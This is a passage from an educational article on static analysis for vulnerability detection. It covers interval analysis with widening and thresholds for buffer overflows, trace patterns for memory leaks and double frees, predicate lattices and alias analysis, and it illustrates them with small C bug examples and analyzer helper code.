vulnerability. But if we can describe vulnerabilities as behaviors that
violate a certain precise property, we are able to state if a
program has a vulnerability or not. Generally, the property depends
on the class of bugs you want to analyse. For instance, properties
that express buffer overflow safety and properties that express heap
corruption (say, a double free) are different ones. In the first case,
we talk about the indexation of a certain memory zone, which must never
go beyond the limit of the allocated memory. Additionally, for
having an overflow, this must be a write access. In case we have a
read access, we could refer to this as an info-leak bug, which
may be blindly or unblindly used by an attacker, depending on whether the
result of the memory read can be inspected from outside the process
or not. Sometimes a read-only out-of-bound access can also be used
to access a part of the code that is not supposed to be executed
in such a context (if the out-of-bound access is used in a predicate).
In all cases, it is interesting to have our analyzer report this
unexpected behavior, because it might lead to a
wrong behavior, and thus, a bug.
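
As a small illustration of such a property, the following Python sketch
classifies a memory access from the interval of its index and the size of the
allocated zone. The function name, the (lo, hi) tuple encoding and the
returned strings are assumptions of this sketch, not part of any existing
tool.

```python
def classify_access(index, size, is_write):
    """Classify an access buf[index] where index is a (lo, hi) interval
    and size is the number of allocated cells."""
    lo, hi = index
    if lo >= 0 and hi < size:
        return "safe"                     # the property holds for every index
    # The property can be violated: the bug class depends on the access type.
    return "possible overflow" if is_write else "possible info-leak"


print(classify_access((0, 15), 16, True))
print(classify_access((0, 16), 16, True))
print(classify_access((0, 16), 16, False))
```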


In this part of the article, we will look at different classes of
bugs, and understand how we can characterize them by running very
simple, repetitive and easy to implement algorithms. Such an algorithm
is simple only because we act on an intermediate form that already
indicates the meaningful dataflow and controlflow facts of the
program. Additionally, we will reason either forward or backward,
depending on what is the most adapted to the vulnerability.


We will start with an example of numerical interval analysis and show
how it can be useful to detect buffer overflows. We will then show
how the dataflow graph without any value information can be useful
for finding problems happening on the heap. We will enrich our
presentation by describing a very classic problem in program analysis,
which is the discovery of equivalence between pointers (do they always
point to the same variable ? sometimes only ? never ?), also known as
alias analysis. We will explain why this analysis is mandatory for any
serious analyzer that acts on real-world programs. Finally, we will
give some more hints about analyzing concurrency properties inside
multithreaded code, trying to characterize what a race condition is.


[ A. Numerical intervals


When looking for buffer overflows or integer overflows, the
information that matters is about the values that can be taken by
memory indexes or integer variables, which are numerical values.


Obviously, it would not be reasonable to compute every single possible
value for all variables of the program, at each program path : this
would take too much time to compute and/or too much memory for the values
graph to get mapped entirely.


By using certain abstractions like intervals, we can represent the set
of all possible values of a variable at a certain point of the program. We
will illustrate this by an example right now. The example itself is
meaningless, but the interesting point is to understand the mechanized
way of deducing information using the dataflow information of the program
graph.


We need to start with a very introductory example, which consists of
finding


Stub 4                      Interval analysis of stub 4

b = 0;                      b = [0 to 0]
if (rand())
  b--;                      b = [-1 to -1]
else
  b++;                      b = [1 to 1]

                            After if/else:
                            b = [-1 to 1]

a = 1000000 / b;            a = [1000000 / -1 to 1000000 / 1]
                            [Reported Error: b can be 0]


In this example, a flow-insensitive analyzer (path-insensitive, in the usual
vocabulary of the literature) will merge the intervals of values at each
control flow merge of the program. This is a seducing approach as you need to
pass a single time on the whole program to compute all intervals. However this
approach is too imprecise most of the time. Why ? In this simple example, the
flow-insensitive analyzer will report a bug of potential division by 0, whereas
it is untrue that b can reach the value 0 at the division program point. It
is because 0 is in the interval [-1 to 1] that this false positive is reported
by the analyzer. How can we avoid this kind of over-conservative analysis ?


We need to introduce some flow-sensitiveness to the analysis, and differentiate
the intervals for the different paths of the program. If we do a complete flow
sensitive analysis of this example, we have:


Stub 4                      Interval analysis of stub 4

b = 0;                      b = [0 to 0]
if (rand())
  b--;                      b = [-1 to -1]
else
  b++;                      b = [1 to 1]

                            After if/else:
                            b = [-1 to -1 OR 1 to 1]

a = 1000000 / b;            a = [1000000 / -1 to 1000000 / -1] or
                                [1000000 /  1 to 1000000 /  1]
                              = {-1000000 or 1000000}


Then the false positive disappears. We should however avoid being flow
sensitive from the beginning. Indeed, if the flow-insensitive analysis
reports no bug, then no bug will be reported by the flow-sensitive analysis
either (at least for this example). Additionally, the size of the complete
flow-sensitive sets of intervals at a given program point grows
exponentially with the number of data flow merging points (that is, Phi()
functions of the SSA form).


For this reason, the best approach seems to be to start with a completely flow
insensitive analysis, and refine it on demand. If the program is transformed
into SSI form, then it becomes pretty easy to know which source intervals we
need to use to compute the destination variable interval of values. We will use
the same kind of analysis for detecting buffer overflows: in that case the
interval analysis will be used on the index variables that are used for
accessing memory at a certain offset from a given base address.
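
The "merge first, refine on demand" strategy can be sketched as follows in
Python for the divisor of Stub 4. This is only a sketch under assumptions:
intervals are (lo, hi) tuples, each path reaching the division contributes
one interval, and the function names are hypothetical.

```python
def hull(intervals):
    """Smallest single interval enclosing all the given (lo, hi) intervals."""
    return (min(lo for lo, _ in intervals), max(hi for _, hi in intervals))


def contains_zero(intervals):
    """True if 0 belongs to at least one of the intervals."""
    return any(lo <= 0 <= hi for lo, hi in intervals)


def check_divisor(per_path):
    """Cheap merged check first; keep one interval per path only on alarm."""
    if not contains_zero([hull(per_path)]):
        return "safe (merged analysis)"
    if not contains_zero(per_path):
        return "safe (after per-path refinement)"
    return "possible division by zero"


# Stub 4: b is [-1, -1] after the if() branch and [1, 1] after the else.
print(hull([(-1, -1), (1, 1)]))
print(check_divisor([(-1, -1), (1, 1)]))
```

The expensive per-path representation is only built for the program points
where the merged intervals raise an alarm.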


Before doing this, we might want to make a remark on the choice of the interval
abstraction itself. This abstraction does not work well when bit swapping is
involved in the operations. Indeed, the intervals will generally have
meaningless values when bits are moved inside the variable. If a cryptographic
operation uses a bit shift that introduces 0 for replacing shifted bits, that
would not be a problem, but swapping bits inside a given word is a problem,
since the output interval is then meaningless.


ex:
    c = a | b  (with A, B, and C integers)
    c = a ^ b
    c = not (c)


Given the intervals of A and B, what can we deduce for the interval of C ? It
is less trivial than a simple numerical change in the variable. Interval
analysis is not very well adapted for analyzing this kind of code, mostly
found in cryptographic routines.
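
A tiny Python experiment shows why bitwise operations are uncomfortable for
intervals. For an addition, combining the bounds of the operands gives the
exact result interval; for a bitwise OR it does not. The two helper functions
below are hypothetical and the brute-force version is only usable on very
small intervals.

```python
def exact_or_range(a, b):
    """Brute-force the exact range of x | y for x in a and y in b."""
    values = [x | y
              for x in range(a[0], a[1] + 1)
              for y in range(b[0], b[1] + 1)]
    return (min(values), max(values))


def endpoint_or_range(a, b):
    """Naive transfer function that only combines the interval bounds."""
    return (a[0] | b[0], a[1] | b[1])


a = (1, 2)
b = (1, 2)
print(exact_or_range(a, b))      # the value 1 | 2 = 3 is reachable
print(endpoint_or_range(a, b))   # the bounds alone never produce 3
```

With a = b = [1 to 2], the value 3 is reachable (1 | 2) although combining
the bounds only yields [1 to 2]: the naive transfer function is unsound here,
and a sound one has to be much coarser.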


We will now analyze an example that involves a buffer overflow on the heap.
Before doing the interval analysis, we will do a first pass to inform us about
the statements related to memory allocation and deallocation. Knowing where
memory is allocated and deallocated is a prerequisite for any further bound
checking analysis.


Stub 5                     Interval analysis with alloc annotations

char *buf;                 buf = _|_ (uninitialized)
int   n = rand();          n   = [-Inf, +Inf]

buf = malloc(n)            buf = initialized of size [-Inf to Inf]
i = 0;                     i   = [0,0], [0,1] ... [0,N]

while (i <= n)
{
  assert(i < N)
  buf[i] = 0x00;
  i++;                     i = [0,1], [0,2] ... [0,N]
                               (iter1 iter2 ... iterN)
}
return (i);

Let's first explain that the assert() is a logical representation in the
intermediate form, and is not an assert() like in a C program. Again, we never
do any dynamic analysis but only static analysis without any execution. In the
static analysis of the intermediate form program, at some point the control
flow will reach a node containing the assert statement. In the intermediate
(abstract) world, reaching an assert() means performing a check on the
abstract value of the predicate inside the assert (i < N). In other words, the
analyzer will check if the assert can be false using interval analysis of
variables, and will print a bug report if it can. We can also leave the
assert() implicit, but representing them explicitly makes the analysis more
generic, modular, and adaptable to the user.
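
Checking such an abstract assert() boils down to comparing interval bounds.
Here is a minimal Python sketch, assuming intervals encoded as (lo, hi) tuples
and a three-valued answer; the function name and the returned strings are
choices made for this illustration only.

```python
def assert_less_than(index, bound):
    """Evaluate the abstract predicate index < bound on (lo, hi) intervals."""
    if index[1] < bound[0]:
        return "holds"       # every index value is below every bound value
    if index[0] >= bound[1]:
        return "fails"       # no index value is below any bound value
    return "may fail"        # some executions violate the predicate


# buf has 10 cells: indexes [0 to 9] are fine, [0 to 10] can overflow.
print(assert_less_than((0, 9), (10, 10)))
print(assert_less_than((0, 10), (10, 10)))
```

The analyzer would print a bug report for both the "fails" and the
"may fail" answers.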


As you can see, there is a one-byte overflow in this example. It is pretty
trivial to spot it manually, however we want to develop an automatic routine
for doing it. If we deploy the analysis that we have done in the previous
example, the assert() that was automatically inserted by the analyzer for
each memory access of the program will fail after N iterations. This is
because arrays in the C language start at index 0 and end at an index one
less than their allocated size. Whatever kind of code is inserted between
those lines (except, of course, bit swapping as previously mentioned), we
will always be able to propagate the intervals and find that memory accesses
are done beyond the allocated limit, thus finding a clear memory disclosure
or memory overwrite vulnerability in the program.


However, this specific example brings 2 more questions: 


- We do not know the actual value of N. Is it a problem ? If we
manage to see that the constraint over the index of buf is actually
the same variable as (or has the same value as) the size of the
allocated buffer, then it is not a problem. We will develop this in
the alias analysis part of this article when this appears to be a
difficulty.


- Whatever the value of N, and provided we managed to identify
all definitions and uses of the variable N, the analyzer will require N
iterations over the loop to detect the vulnerability. This is not
acceptable, especially if N is very big, in which case many
minutes will be necessary for analysing this loop, when we actually
want an answer in the next seconds.


The answer for this optimization problem is a technique called Widening,
borrowed from the theory of abstract interpretation. Instead of executing the
loop N times until the loop condition is false, we will go directly, in 1
iteration, to the last possible value in a certain interval, and this as soon
as we detect a monotonic increase of the interval. The previous example would
then compute like in:

Stub 5                     Interval analysis with Widening

char *buf;                 buf = _|_ (uninitialized)
int   n = rand();          n   = [-Inf, +Inf]

buf = malloc(n)            buf = initialized of size [-Inf to Inf]
i = 0;                     i   = [0,0]

while (i <= n)
{
  assert(i < N);               iter1  iter2  iter3  iter4   ASSERT!
  buf[i] = 0x00;           i = [0,0], [0,1]  [0,2]  [0,N]
  i++;                     i = [0,1], [0,2]  [0,3]  [0,N]
}
return (i);
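
To give an idea of the gain, here is a Python sketch of the abstract execution
of the Stub 5 loop, with and without widening. It is a simplified model under
several assumptions: n is a concrete number chosen for the demonstration
(the article keeps N symbolic), only the upper bound of i is widened, and it
is widened straight to +Inf before being cut back by the loop guard.

```python
def analyze_loop(n, widen):
    """Abstractly run: i = 0; while (i <= n) { access buf[i]; i++; }

    Returns the interval of i at the memory access and the number of
    abstract iterations needed to reach the fixpoint.
    """
    head = (0, 0)                # interval of i at the loop head
    steps = 0
    while True:
        steps += 1
        inside = (head[0], min(head[1], n))       # filtered by guard i <= n
        after = (inside[0] + 1, inside[1] + 1)    # effect of i++
        new_head = (min(head[0], after[0]), max(head[1], after[1]))
        if widen and new_head[1] > head[1]:
            # The upper bound is still growing: jump directly to +Inf.
            new_head = (new_head[0], float("inf"))
        if new_head == head:                      # fixpoint reached
            return inside, steps
        head = new_head


print(analyze_loop(1000, widen=False))
print(analyze_loop(1000, widen=True))
```

Both runs find that i can reach n at the access to a buffer of n cells, which
is the overflow, but the widened run needs 2 abstract iterations where the
naive one needs a number of iterations proportional to n.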


Using widening, we can directly go to the biggest possible interval in only
a few iterations, thus reducing drastically the time required for finding
the vulnerability. However this optimization might introduce additional
difficulties when a conditional statement is inside the loop:


Stub 6                     Interval analysis with Widening

char *buf;                 buf = _|_ (uninitialized)
int   n = rand() + 2;      n   = [-Inf, +Inf]

buf = malloc(n)            buf = initialized of size [-Inf to Inf]
i = 0;                     i   = [0,0]

while (i <= n)             i = [0,0] [0,1] [0,2] [0,N] [0,N+1]
{
  if (i < n - 2)           i = <same as previously for all iterations>
  {
    assert(i < N - 1)      [Never triggered !]
    buf[i] = 0x00;         i = [0,0] [0,1] [0,2] [0,N] <False positive>
  }
  i++;                     i = [0,1] [0,2] [0,3] [0,N] [0,N+1]
}
return (i);


In this example, we cannot assume that the interval of i will be the same
everywhere in the loop (as we might be tempted to do as a first hint for
handling intervals in a loop). Indeed, in the middle of the loop stands a
condition (with the predicate being i < n - 2) which forbids the interval to
grow in some part of the code. This is problematic especially if we decide to
use widening until the loop breaking condition. We will miss this more subtle
distribution of values in the variables of the loop. The solution for this
is to use widening with thresholds. Instead of applying widening in a single
step over the entire loop, we will define a sequence of values which
correspond to "strategic points" of the code, so that we can decide to
increase precisely using a small-step values iteration.


The strategic points can be the list of values on which a condition is
applied. In our case we would apply widening until n = N - 2 and not until
n = N. This way, we will not trigger a false positive anymore because of an
overapproximation of the intervals over the entire loop. When each step is
realized, that allows us to annotate which program location is the subject
of the widening in the future (in our case: the loop code before and after
the "if" statement).


Note that, when we reach a threshold during widening, we might need to apply
a small-step iteration more than once before widening again until the next
threshold. For instance, when predicates such as (a != immed_value) are met,
they will forbid the inner code of the condition to have its intervals
propagated. However, they will forbid this for just one iteration (provided
a is an inductive variable, so its state will change at the next iteration)
or for multiple iterations (if a is not an inductive variable and will be
modified only at another moment in the iterative abstract execution of the
loop). In the first case, we need only 2 small-step abstract iterations to
find out that the interval continues to grow after a certain iteration. In
the second case, we will need multiple iterations until some condition inside
the loop is reached. We then simply need to make sure that the threshold list
includes the variable value used at this predicate (which heads the code
where the variable a will change). This way, we can apply only 2 small-step
iterations between those "bounded widening" steps, and avoid generating false
positives using a very optimized but precise abstract evaluation sequence.


Our example was an easy one: the threshold list is made of only 2 elements
(n and (n - 2)).
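
To make the idea concrete, here is a minimal sketch in C of an interval widening
operator driven by a threshold list. The names interval_t and widen_with_thresholds
are hypothetical (they come from no existing analyzer), and only the upper bound is
really widened, to keep the code short:

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

/* Closed integer interval [lo, hi] (hypothetical type, for illustration). */
typedef struct { long lo, hi; } interval_t;

/*
 * Widen 'prev' with the newly computed 'next'. When the upper bound grows,
 * it jumps to the smallest threshold >= next.hi rather than to infinity.
 * 'th' holds 'nth' thresholds sorted in ascending order.
 */
interval_t widen_with_thresholds(interval_t prev, interval_t next,
                                 const long *th, size_t nth)
{
    interval_t out = prev;
    size_t k;

    assert(prev.lo <= prev.hi && next.lo <= next.hi);
    if (next.lo < prev.lo)
        out.lo = next.lo;            /* lower bound: plain join in this sketch */
    if (next.hi > prev.hi) {
        out.hi = LONG_MAX;           /* no threshold left: classic widening */
        for (k = 0; k < nth; k++) {
            if (th[k] >= next.hi) {
                out.hi = th[k];
                break;
            }
        }
    }
    return out;
}
```

With N = 100 and the threshold list {98, 100}, widening [0,0] with [0,1] stops at
[0,98]; a small-step iteration then yields [0,99], which widens to [0,100].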


But what if a condition is realized using 2 variables and not a variable and
an immediate value ? In that case we have 3 cases:

CASE1 - The 2 variables are inductive variables: in that case, the threshold lists of
the two variables must be fused, so that widening does not step over a condition that
would make it lose precision. This seems to be a reasonable condition when one variable
is the subject of a constraint that involves a constant and the second variable is the
subject of a constraint that involves the first variable:
Stub 7                                        Threshold discovery

int a = MIN_LOWERBOUND;
int b = MAX_UPPERBOUND;
int i = 0;
int n = MAXSIZE;

while (i < n)                                 Found threshold n
{
  if (a < i && i < b)                         Found predicate involving a and b
    (...)
  if (a > sizeof(something))                  Found threshold for a
    i = b;
  else if (b + 1 < sizeof(buffer))            Found threshold for b
    i = a;
}


In that case, we can define the threshold of this loop as a list of 2 values,
one being sizeof(something), the other one being sizeof(buffer), or sizeof(buffer) - 1
in case the analyzer is a bit more clever (and if the assembly code makes it clear
that the condition applies to sizeof(buffer) - 1).


CASE2 - One of the variables is inductive and the other one is not.

  So we have 2 subcases:

  - The inductive variable is involved in a predicate that leads to modification
    of the non-inductive variable. This is not possible without the 2 variables
    being inductive ! Thus we fall into case 1 again.

  - The non-inductive variable is involved in a predicate that leads to
    modification of the inductive variable. In that case, the non-inductive
    variable is invariant over the loop, which means that a test between
    its domain of values (its interval) and the domain of the inductive
    variable is required as a condition to enter the code stubs headed by the
    analyzed predicate. Again, we have 2 sub-subcases:

    * Either the predicate is a test == or !=. In that case, we must compute
      the intersection of both variables' intervals. If the intersection is void,
      the test will never be true, so it is dead code. If the intersection is itself
      an interval (which will be the case most of the time), it means that the
      test will be true over this part of the inductive variable's interval, and
      false over the remaining domain of values. In that case, we need to put
      the bounds of the non-inductive variable interval into the threshold list for
      the widening of the inductive variables that depend on this non-inductive
      variable.

    * Or the predicate is a comparison : a < b (where a or b is an inductive
      variable). The same remarks hold : we compute the intersection interval
      between a and b. If it is void, the test will always be true or always be
      false, and we know this before entering the loop. If the interval is not
      void, we need to put the bounds of the intersection interval in the widening
      threshold list of the inductive variable.
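
The comparison sub-subcase can be sketched as follows in C. This is only an
illustration under our own assumptions: interval_t, interval_intersect and
add_intersection_thresholds are hypothetical names, and the threshold list is a
plain array provided by the caller:

```c
#include <assert.h>
#include <stddef.h>

typedef struct { long lo, hi; } interval_t;

/* Store the intersection of a and b in *out; return 0 if it is void. */
int interval_intersect(interval_t a, interval_t b, interval_t *out)
{
    long lo = (a.lo > b.lo) ? a.lo : b.lo;
    long hi = (a.hi < b.hi) ? a.hi : b.hi;

    assert(out != NULL && a.lo <= a.hi && b.lo <= b.hi);
    if (lo > hi)
        return 0;           /* void: the test is decided before the loop */
    out->lo = lo;
    out->hi = hi;
    return 1;
}

/*
 * Append the bounds of the intersection between the inductive and the
 * invariant variable to the threshold list 'th' (capacity 'cap').
 * Returns the new number of thresholds.
 */
size_t add_intersection_thresholds(interval_t inductive, interval_t invariant,
                                   long *th, size_t nth, size_t cap)
{
    interval_t both;

    if (!interval_intersect(inductive, invariant, &both))
        return nth;         /* nothing to add */
    if (nth + 2 <= cap) {
        th[nth++] = both.lo;
        th[nth++] = both.hi;
    }
    return nth;
}
```

For an inductive variable in [0,100] compared with an invariant one in [40,60], the
values 40 and 60 are added to the threshold list. The resulting list would still have
to be sorted before being used by a widening operator.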


CASE3 - None of the variables are inductive variables

  In that case, the predicate that they define has a single value over the
  entire loop, and can be computed before the loop takes place. We can then
  turn the conditional code into unconditional code and apply widening
  as if the condition did not exist. Or, if the condition is always
  false, we simply remove this code from the loop, as the content of
  the conditional statement will never be reached.


As you can see, we need to be very careful in how we perform the widening. If
the widening is done without thresholds, the abstract numerical values will
be overapproximated, and our analysis will generate a lot of false positives.
By introducing thresholds, we sacrifice very little performance and gain a lot of
precision over the looping code analysis. Widening is a convergence accelerator
for detecting problems like buffer overflows. Some overflow problems can happen
after millions of loop iterations, and widening brings a nice solution for
getting immediate answers even on those constructs.


I have not detailed how to find the size of buffers in this paragraph. Whether
the buffers are stack or heap allocated, they need to have a fixed size at
some point, and the stack pointer must be subtracted somewhere (or malloc
needs to be called, etc), which gives us the information of allocation
together with its size, from which we can apply our analysis.


We will now switch to the last big part of this article, by explaining how 
to check for another class of vulnerability. 


[ B. Type state checking (aka double free, memory leaks, etc)


There are some other types of vulnerabilities that are slightly different to
check. In the previous part we explained how to reason about intervals of
values to find buffer overflows in programs. We presented an optimization
technique called Widening and we have studied how to weaken it for gaining
precision, by generating a threshold list from a set of predicates. Note that
we haven't explicitly used what is called "predicate abstraction", which
may improve the efficiency of the analysis further. The interested
reader will for sure find resources about predicate abstraction on any good
research-oriented search engine. Again, this article is not intended to give
all solutions to the problems of the world, but to introduce the novice hacker
to the concrete problems of program analysis.


In this part of the article, we will study how to detect memory leaks and
heap corruptions. The basic technique to find them is not linked with interval
analysis, but interval analysis can be used to make type state checking more
accurate (reducing the number of false positives).

Let's take an example of a memory leak to be concrete:
Stub 8

 1. u_int off = 0;
 2. u_int ret = MAXBUF;
 3. char *buf = malloc(ret);
 4. do {
 5.    off += read(sock, buf + off, ret - off);
 6.    if (off == 0)
 7.       return (-ERR);
 8.    else if (ret == off)
 9.       buf = realloc(buf, ret * 2);
10. } while (ret);
11. printf("Received %s \n", buf);
12. free(buf);
13. return;

In that case, there is no overflow but if some condition appears after the read, an error
is returned without freeing the buffer. This is not a vulnerability as such, but it can
help a lot for managing the memory layout of the heap while trying to exploit a heap
overflow vulnerability. Thus, we are also interested in detecting memory leaks that
turn some particular exploits into powerful weapons.

Using the graphical representation of control flow and data flow, we can easily
find out that the code is wrong:

Graph analysis of Stub 8

    [control-flow graph of Stub 8, annotated with the events below]

    A:   Allocation
    REA: Realloc
    F:   Free
    R:   Return

Note that this representation is not a data flow graph but a
control-flow graph annotated with data allocation information for
the BUF variable. This allows us to reason about existing control
paths and sequences of memory related events. Another way of doing
this would have been to reason about data dependences together with
the predicates, as done in the first part of this article with the
Labelled SSI form. We are not dogmatic towards one or another
intermediate form, and the reader is invited to ponder by himself
which representation fits better to his understanding. I invite
you to think twice about the SSI form, which is really a condensed
view of lots of different information. For pedagogical purposes, we
switch here to a more intuitive intermediate form that expresses a
similar class of problems.


 0. #define PACKET_HEADER_SIZE 20

 1. u_int off = 0;
 2. u_int ret = 10;
 3. char *buf = malloc(ret);                               M
 4. do {
 5.    off += read(sock, buf + off, ret - off);
 6.    if (off <= 0)
 7.       return (-ERR);                                   R
 8.    else if (ret == off)
 9.       buf = realloc(buf, (ret = ret * 2));             REA
10. } while (off != PACKET_HEADER_SIZE);
11. printf("Received %s \n", buf);
12. free(buf);                                             F
13. return;                                                R


Using a simple DFS (Depth-First Search) over the graph representing Stub 8,
we are capable of extracting sequences like:

1,2,(3 M),4,5,6,8,10,11,(12 F),(13 R)            M...F...R       -noleak-
1,2,(3 M),4,(5,6,8,10)*,11,(12 F),(13 R)         M(...)*F...R    -noleak-
1,2,(3 M),4,5,6,8,10,5,6,(7 R)                   M...R           -leak-
1,2,(3 M),(4,5,6,8,10)*,5,6,(7 R)                M(...)*R        -leak-
1,2,(3 M),4,5,6,8,(9 REA),10,5,6,(7 R)           M...REA...R     -leak-
1,2,(3 M),4,5,6,(7 R)                            M...R           -leak-
etc


More generally, we can represent the set of all possible traces for
this example:

      1,2,3,(5,6,(7 | 8(9 | Nop)) 10)*,(11,12,13)*

with | meaning choice and * meaning potential looping over the events
placed between (). As the program might loop more than once or twice,
a lot of different traces are potentially vulnerable to the memory leak
(not only the few we have given), but all of them can be expressed using this
global generic regular expression over the events of the loop. The vulnerable
ones are those matching this regular expression:


      .*(M)[^F]*(R)

that represents traces containing a malloc followed by a return without
an intermediate free, which corresponds in our program to:

      .*(3)[^12]*(7)
    = .*(3).*(7)          # because 12 is not between 3 and 7 in any cycle

In other words, if we can extract a trace that leads to a return after passing
by an allocation not followed by a free (with an undetermined number of states
between those 2 steps), we found a memory leak bug.


We can then compute the intersection of the global regular expression trace
and the vulnerable traces regular expression to extract all potentially
vulnerable paths from a language of traces. In practice, we will not generate
all vulnerable traces but simply emit a few of them, until we find one that
we can indeed trigger.

Clearly, the first two traces have a void intersection (they don't contain 7). So
those traces are not vulnerable. However, the next trace expressions match
the pattern, thus are potentially vulnerable paths for this vulnerability.


We could use the exact same system for detecting double frees, except that
our trace pattern would be:

      .*(F)[^A]*(F)

that is : a free followed by a second free on the same dataflow, not passing
through an allocation between those. A simple trace-based analyzer can detect
many cases of vulnerabilities using a single engine ! That superclass of
vulnerabilities is made of so-called type-state vulnerabilities, following the idea
that even if the type of a variable does not change during the program, its state
does, thus the standard type checking approach is not sufficient to detect this kind
of vulnerabilities.
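
As a rough sketch of such a single engine, the C function below checks one event
trace against a pattern of the form .*(X)[^Y]*(Z). The encoding of events as
characters ('M' for an allocation, 'F' for a free, 'R' for a return, anything else
for the other states) and the name trace_matches are our own assumptions, not part
of any existing tool:

```c
#include <assert.h>
#include <stddef.h>

/*
 * Return 1 if 'trace' contains the event 'first', later followed by the
 * event 'second', with no 'reset' event in between. Each character of
 * 'trace' is one event of a path extracted from the graph.
 */
int trace_matches(const char *trace, char first, char reset, char second)
{
    int armed = 0;      /* 1 once 'first' was seen and not yet reset */
    size_t i;

    assert(trace != NULL);
    for (i = 0; trace[i] != '\0'; i++) {
        char ev = trace[i];

        if (armed && ev == second)
            return 1;   /* pattern matched: potential bug on this path */
        if (ev == first)
            armed = 1;
        else if (ev == reset)
            armed = 0;
    }
    return 0;
}
```

A memory leak check is then trace_matches(t, 'M', 'F', 'R') and a double free check
is trace_matches(t, 'F', 'M', 'F'), 'M' playing the role of the allocation event A of
the pattern above. Like the technique it illustrates, this sketch ignores predicates.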


As the careful reader might have noticed, this algorithm does not take predicates
into account, which means that if such a vulnerable trace is emitted, we have no
guarantee that the real conditions of the program will ever execute it. Indeed, we
might extract a path of the program that "crosses" multiple predicates, some
being incompatible with others, thus generating infeasible paths using our
technique.


For example in our Stub 8 translated to assembly code, a predicate-insensitive
analysis might generate the trace:

      1,2,3,4,5,6,8,9,10,11,12,13

which is impossible to execute because the predicates holding at states 8 and 10
cannot be respectively true and false after just one iteration of the loop. Thus
such a trace cannot exist in the real world.


We will not go further into this topic in this article, but in the next part, we will
discuss various improvements that a good analysis engine should have to avoid
generating too many false positives.


[ C. How to improve


In this part, we will quickly review various methods to determine how exactly
it is possible to make the analysis more accurate and efficient. Researchers
in program analysis call this "counter-example guided" verification. Various
techniques taken from the world of Model Checking or Abstract Interpretation can then
be used, but we will not enter such theoretical concerns. We will simply discuss the
ideas of those techniques without entering into details. The proposed chevarista
analyzer in the appendix of this article only performs basic alias analysis, no
predicate analysis, and no thread scheduling analysis (as would be useful for detecting
race conditions).

I will give the names of a few analyzers that implement these analyses and mention which
techniques they are using.


[ a. Predicate analysis and the predicate lattice 


Predicate abstraction [PA] is about collecting all the predicates in a program, and
constructing from this list a mathematical object called a lattice [LAT]. A lattice is
a set of objects on which a certain (partial) order is defined between elements
of this set. A lattice has various theoretical properties that make it different
from a mere partial order, but we will not give such details in this article. We will
discuss the order itself and the types of objects we are talking about:

  - The order can be defined as the inclusion of objects
    (P < Q iff P is included in Q)

  - The objects can be predicates

  - The conjunction (AND) of predicates can be the least upper bound of N
    predicates. Predicates (a > 42) and (b < 2) have as upper bound:

        (a > 42) && (b < 2)

  - The disjunction (OR) of predicates can be the greatest lower bound of
    N predicates. Predicates (a > 42) and (b < 2) would have as lower
    bound:

        (a > 42) || (b < 2)

So the lattice would look like:

              (a > 42) && (b < 2)
                  /       \
                 /         \
                /           \
          (a > 42)         (b < 2)
                \           /
                 \         /
                  \       /
              (a > 42) || (b < 2)


Now imagine we have a program that has N predicates. If all predicates
can be true at the same time, the number of combinations between predicates
will be 2 to the power of N. This is without counting the lattice elements
which are disjunctions between predicates. The total number of combinations
will then be 2 * 2pow(N) - N : we have to subtract N because the predicates
made of a single atomic predicate are shared between the set of conjunctive
and the set of disjunctive predicates, which both have 2pow(N)
elements including the atomic predicates, which are the base case for a conjunction
(pred && true) or a disjunction (pred || false).

We may also need to consider the other values of predicates : false, and unknown.
False would simply be the negation of a predicate, and unknown would inform about
the unknown truth value of a predicate (either false or true, but we don't know).
In that case, the number of possible combinations between predicates is the number
of possible combinations of N predicates, each of them being potentially
true, false, or unknown. That makes up to 3pow(N) possibilities. This approach is
called three-valued logic [TVLA].


In other words, we have an exponential worst case space complexity for constructing
the lattice of predicates that corresponds to an analyzed program. Very often, the
lattice will be smaller, as many predicates cannot be true at the same time. However,
there is a big limitation in such a lattice: it is not capable of analyzing predicates
that mix AND and OR. It means that if we analyze a program that can be reached using
many different sets of predicates (say, by executing many different possible paths,
which is the case for reusable functions), this lattice will not be capable of giving
the most precise "full" abstract representation for it, as it may introduce some
flow-insensitivity in the analysis (i.e. a single predicate combination will represent
multiple different paths). Although this might generate false positives, it looks like a
good trade-off between precision and complexity. Of course, this lattice is just
provided as an example and the reader should feel free to adapt it to his precise needs,
depending on the size of the code to be verified. It is a good hint for a given
abstraction, but we will see that other information than predicates is important for
program analysis.
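
The three truth values mentioned above can be sketched in C as follows. The text does
not say which connectives are used, so this sketch assumes Kleene's strong three-valued
logic (AND as minimum, OR as maximum over false < unknown < true); all names are
hypothetical:

```c
#include <assert.h>

/* Truth values ordered so that min/max implement AND/OR. */
typedef enum { TV_FALSE = 0, TV_UNKNOWN = 1, TV_TRUE = 2 } tv_t;

tv_t tv_and(tv_t a, tv_t b) { return (a < b) ? a : b; }
tv_t tv_or(tv_t a, tv_t b)  { return (a > b) ? a : b; }
tv_t tv_not(tv_t a)         { return (tv_t)(TV_TRUE - a); }

/* Number of valuations of n predicates, each true, false or unknown: 3^n. */
unsigned long tv_valuations(unsigned n)
{
    unsigned long r = 1;

    assert(n <= 20);    /* 3^20 still fits in a 32-bit unsigned long */
    while (n-- > 0)
        r *= 3;
    return r;
}
```

For instance, (true AND unknown) stays unknown while (false AND unknown) is false, so
an analysis can sometimes decide a combined predicate without knowing all its parts.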


[ b. Alias analysis is hard 


A problem that arises in automated auditing of source code, and even more of binary
code, is the alias analysis between pointers. When do pointers
point to the same variables ? This is important in order to propagate the
inferred allocation size (when talking about a buffer), and to share a
type-state (such as when a pointer is freed or allocated : you could miss
double free or double-something bugs if you don't know that 2 variables are
actually the same).


There are multiple techniques to achieve alias analysis. Some of them work
inside a single function (so-called intraprocedural [DDA]). Others work across
the boundaries of a function. Generally, the more precise your alias
analysis is, the smaller the program you will be capable of analyzing. It seems
quite difficult to scale to millions of lines of code if tracking every
single location for all possible pointers in a naive way. In addition
to the problem that each variable might have a very big number of aliases
(especially when involving aliases over arrays), a program translated to
a single-assignment or single-information form has a very big number of
variables too. However, the live range of those variables is very limited,
and so is their number of aliases. It is necessary to define aliasing relations
between variables so that we can proceed with our analysis using some extra checks:

  - no_alias(a,b)   : Pointers a and b definitely point to different sets
                      of variables

  - must_alias(a,b) : Pointers a and b definitely point to the same set
                      of variables

  - may_alias(a,b)  : The "point-to" sets for variables a and b share some
                      elements (non-null intersection) but are not equal.
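
Following the three definitions above literally, and assuming (for illustration only)
that a point-to set is encoded as a bitmask where bit k stands for abstract memory
location k, the relation between two pointers could be classified like this. The names
alias_t and classify_alias are hypothetical:

```c
#include <assert.h>

typedef enum { NO_ALIAS, MAY_ALIAS, MUST_ALIAS } alias_t;

/*
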